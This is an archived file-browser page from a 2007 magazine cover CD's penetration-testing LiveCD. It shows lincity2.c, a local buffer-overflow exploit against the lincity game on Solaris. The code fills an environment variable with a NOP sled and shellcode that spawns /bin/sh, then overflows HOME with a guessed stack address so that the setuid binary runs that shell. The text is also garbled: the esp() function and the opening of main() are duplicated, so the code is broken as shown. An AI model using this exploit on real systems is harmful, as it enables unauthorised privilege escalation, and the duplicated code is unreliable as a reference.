Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / lincity2.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 2KB | 86 lines

#include <stdio.h> #include <stdlib.h> #define HOMESIZE500 #define HUEVOSIZE 5000 char *shell = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; long esp(void) { __asm__("movl %esp,%eax\n"); } int main(void) { char *ptr, *bof, *egg; long *addr_ptr, addr; int i; if ( !(bof = malloc(HOMESIZE)) ) { printf("NoMoreMemory4bof.\n"); exit(1); } if ( !(egg = malloc(HUEVOSIZE)) ) { printf("NoMoreMemory4egg.\n"); exit(1); } long esp(void) { __asm__("movl %esp,%eax\n"); } int main(void) { char *ptr, *bof, *egg; long *addr_ptr, addr; int i; if ( !(bof = malloc(HOMESIZE)) ) { printf("NoMoreMemory4bof.\n"); exit(1); } if ( !(egg = malloc(HUEVOSIZE)) ) { printf("NoMoreMemory4egg.\n"); exit(1); } addr = esp(); addr_ptr = (long *) bof; for (i = 0; i < HOMESIZE; i += 4) *(addr_ptr++) = addr; ptr = egg; for (i = 0; i <= HUEVOSIZE - strlen(shell) - 2; i++) *(ptr++) = 0x90; for( i = 0; i < strlen(shell); i++) *(ptr++) = shell[i]; printf("Address:\t0x%x\n", addr); bof[HOMESIZE - 1] = '\0'; egg[HUEVOSIZE - 1] = '\0'; memcpy(bof, "BOF=", 4); memcpy(egg , "EGG=", 4); putenv(bof); putenv(egg); system("export HOME=$BOF; /usr/games/lincity"); }